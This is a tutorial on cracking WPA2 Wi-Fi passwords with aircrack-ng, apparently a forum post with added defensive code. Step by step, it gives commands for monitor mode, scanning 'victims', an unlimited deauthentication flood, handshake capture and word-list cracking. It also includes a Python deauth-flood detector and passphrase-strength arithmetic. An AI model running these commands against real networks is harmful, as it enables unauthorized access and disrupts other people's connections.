ryukxiao
This works only on WPA2 networks, using brute force (a word list attack against the captured handshake).
Requirements:
1. aireplay-ng
2. Kali Linux
3. airodump-ng
4. aircrack-ng
5. A word list
6. A handshake (we will capture it in this tutorial)
7. A wireless card that supports monitor mode
0. Fire up your Kali Linux
First we need to find our target, and the first step is to put our wireless card in monitor mode.
1. Putting the wireless card in monitor mode:
Open a console and type:
iwconfig
This command will show your wireless cards; it should look like this:
As you can see I have the wlan0 card. Look at the Mode: in my case it is Managed, and we need to change it to Monitor using this command:
airmon-ng start wlan0
Type iwconfig again and check that your wireless card is in monitor mode. If you did this correctly, congrats, we are now ready to scan for victims.
2. Scanning for victims
Using airodump-ng we will scan for wireless networks by running this command:
airodump-ng wlan0mon
I used wlan0mon instead of wlan0 because when we used airmon-ng to change the mode it also renamed the interface to wlan0mon (mon = monitor).
After running the command you should see something like this:
Wait until you see your network, then press CTRL+C.
Once you have found your network, copy its BSSID and channel and keep them.
3. Capturing the handshake
Here is the fun part: we will capture the handshake.
We will use airodump-ng to get the handshake.
First, run the following command (the placeholders in angle brackets are yours to fill in):
airodump-ng -c <channel> --bssid <bssid> -w . wlan0mon
Replace <channel> with the channel
and <bssid> with the BSSID you noted in step 2.
We are now listening for handshakes; we will capture one when a device connects to the network. If you are impatient, you can flood the wifi network (without being connected to it) to force devices to reconnect, using this command in another window:
aireplay-ng -0 0 -a <bssid> wlan0
If it doesn't work, try wlan0mon.
So let's explain the command:
-0 > means that we are making a deauth attack
0 > means that we will send an infinite number of packets to the wifi
-a <bssid> > is the flag for the wifi network (its BSSID)
wlan0 > is our interface; use wlan0mon in case it doesn't work.
Let the command run until you see this:
As you can see, in the bigger window we have a "WPA handshake" notification; that means you captured the handshake!
You can find your handshake in the folder you ran the command from; it is a .cap file.
After you get the handshake, stop the aireplay-ng command using CTRL+C.
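The forced-reconnect trick above relies on unauthenticated deauthentication frames, and that is exactly what a wireless IDS watches for. As an added example that is not part of the original post, the Python below parses the 802.11 management header of raw frames and raises an alert when one BSSID emits more than a threshold of deauth/disassoc frames inside a one-second window; the frames it runs over are constructed sample data, and the BSSIDs, timestamps and threshold are assumptions for the demo.

```python
"""Detect a deauthentication flood from raw 802.11 management frames.

Added example, not from the original post. All frames below are
constructed in code for the demo; nothing here is captured traffic.
"""
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
# Management-frame subtypes (IEEE 802.11 type 0) that disconnect a client.
DISCONNECT_SUBTYPES = {10: "disassoc", 12: "deauth"}


def _mac(frame: bytes, off: int) -> str:
    return ":".join(f"{b:02x}" for b in frame[off:off + 6])


def parse_mgmt_header(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, reason) for a management frame,
    or None if the frame is too short or not a management frame."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]                  # first byte of the Frame Control field
    ftype = (fc0 >> 2) & 0x3        # 0 = management, 1 = control, 2 = data
    subtype = (fc0 >> 4) & 0xF
    if ftype != 0:
        return None
    reason = None
    if subtype in DISCONNECT_SUBTYPES and len(frame) >= 26:
        reason = int.from_bytes(frame[24:26], "little")  # reason code body
    return subtype, _mac(frame, 4), _mac(frame, 10), _mac(frame, 16), reason


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_seconds, frame_bytes) in time order.
    Alert once per BSSID (addr3) that sends more than `threshold`
    deauth/disassoc frames within any `window` seconds."""
    recent = defaultdict(list)      # bssid -> timestamps inside the window
    alerted, alerts = set(), []
    for ts, frame in frames:
        parsed = parse_mgmt_header(frame)
        if parsed is None or parsed[0] not in DISCONNECT_SUBTYPES:
            continue
        subtype, addr1, _addr2, addr3, reason = parsed
        times = recent[addr3]
        times.append(ts)
        while ts - times[0] > window:   # slide the window forward
            times.pop(0)
        if len(times) > threshold and addr3 not in alerted:
            alerted.add(addr3)
            alerts.append({"bssid": addr3, "kind": DISCONNECT_SUBTYPES[subtype],
                           "count": len(times), "broadcast": addr1 == BROADCAST,
                           "reason": reason, "ts": ts})
    return alerts


def sample_deauth_frame(bssid: str, dst: str = BROADCAST, reason: int = 7) -> bytes:
    """Constructed test data: a minimal deauth frame (never transmitted)."""
    fc = bytes([0xC0, 0x00])        # type 0, subtype 12 = deauthentication
    b = bytes.fromhex(bssid.replace(":", ""))
    d = bytes.fromhex(dst.replace(":", ""))
    return fc + b"\x00\x00" + d + b + b + b"\x00\x00" + reason.to_bytes(2, "little")


def sample_capture():
    """Constructed capture: 15 broadcast deauths in 0.15 s from one BSSID,
    a beacon, and a single legitimate deauth from another BSSID."""
    flood_bssid, quiet_bssid = "02:00:00:00:aa:01", "02:00:00:00:bb:02"
    frames = [(i * 0.01, sample_deauth_frame(flood_bssid)) for i in range(15)]
    qb = bytes.fromhex(quiet_bssid.replace(":", ""))
    beacon = bytes([0x80, 0x00]) + b"\x00\x00" + bytes.fromhex("ff" * 6) + qb + qb + b"\x00\x00"
    frames.append((0.2, beacon))
    frames.append((5.0, sample_deauth_frame(quiet_bssid, "02:00:00:00:cc:03", reason=3)))
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_capture()):
        print(alert)
```

The strongest single signal is a burst of broadcast deauths (addr1 = ff:ff:ff:ff:ff:ff) with the same reason code, which is what a blanket deauth of every client looks like; a single deauth to one station at a normal rate is ordinary roaming and is not flagged. The mitigation on the network side is 802.11w Protected Management Frames, which makes unauthenticated deauth frames from a third party fail verification.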
4. Cracking the password
We will use aircrack-ng, the .cap file, and a word list.
Enter this command:
aircrack-ng -a2 -b <bssid> -w <wordlist> <capture.cap>
Replace <bssid> with the BSSID, <wordlist> with the word list file, and <capture.cap> with the capture file name.
If the password is in the word list, you will get something like this:
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ password123 ]
Master Key    : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC    : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
Congrats! You cracked the password.
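The "Master Key" in that output is the WPA2 Pairwise Master Key, and the reason a word list works at all is how it is derived: WPA2-Personal runs PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 256-bit output. Every candidate costs those 4096 HMAC rounds, which is why the post's run manages only about a thousand keys per second and why the passphrase's size, not the cracker, decides the outcome. As an added example that is not part of the original post, the Python below derives the PMK (checked against the IEEE 802.11 published test vector, passphrase "password" / SSID "IEEE") and turns the rate shown in the post's output into the time a defender should expect a given keyspace to hold; the 62-character alphabet and 12-character length are assumptions for the policy check.

```python
"""WPA2-PSK master key derivation and what a word list attack costs.

Added example, not from the original post. Only the PMK step is
implemented: the PTK and the EAPOL MIC that aircrack-ng verifies are
derived further from the PMK, the two nonces and the two MAC addresses
of the handshake, which is why the .cap file is needed.
"""
import hashlib

PBKDF2_ITERATIONS = 4096      # fixed by the 802.11 standard for WPA-PSK
PMK_LEN = 32                  # 256-bit Pairwise Master Key
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def seconds_to_exhaust(candidates: int, keys_per_second: float) -> float:
    """Time to try every candidate at a given cracking rate."""
    return candidates / keys_per_second


def years_to_exhaust(alphabet_size: int, length: int, keys_per_second: float) -> float:
    """Worst case for a random passphrase drawn uniformly from the alphabet."""
    return seconds_to_exhaust(alphabet_size ** length, keys_per_second) / SECONDS_PER_YEAR


if __name__ == "__main__":
    # Published 802.11 test vector; the expected PMK is given in the standard.
    print(wpa2_pmk("password", "IEEE").hex())
    # Rate taken from the post's aircrack-ng output: 1017.96 keys per second.
    rate = 1017.96
    print(f"{seconds_to_exhaust(111040, rate):.1f} s for the 111040-word list in the post")
    print(f"{years_to_exhaust(62, 12, rate):.3g} years for a random 12-char [A-Za-z0-9] passphrase")
```

The first print reproduces the post's own timing (111040 keys at 1017.96 k/s is the 1:49 shown on screen), and the second shows the other side of the same arithmetic: a random 12-character alphanumeric passphrase is out of reach of a word list at any rate a laptop produces. GPU crackers are orders of magnitude faster than the rate in the post, so the policy lesson is passphrase entropy, not a particular word list; WPA3-SAE removes the offline attack entirely because the handshake no longer lets an observer test candidates without talking to the access point.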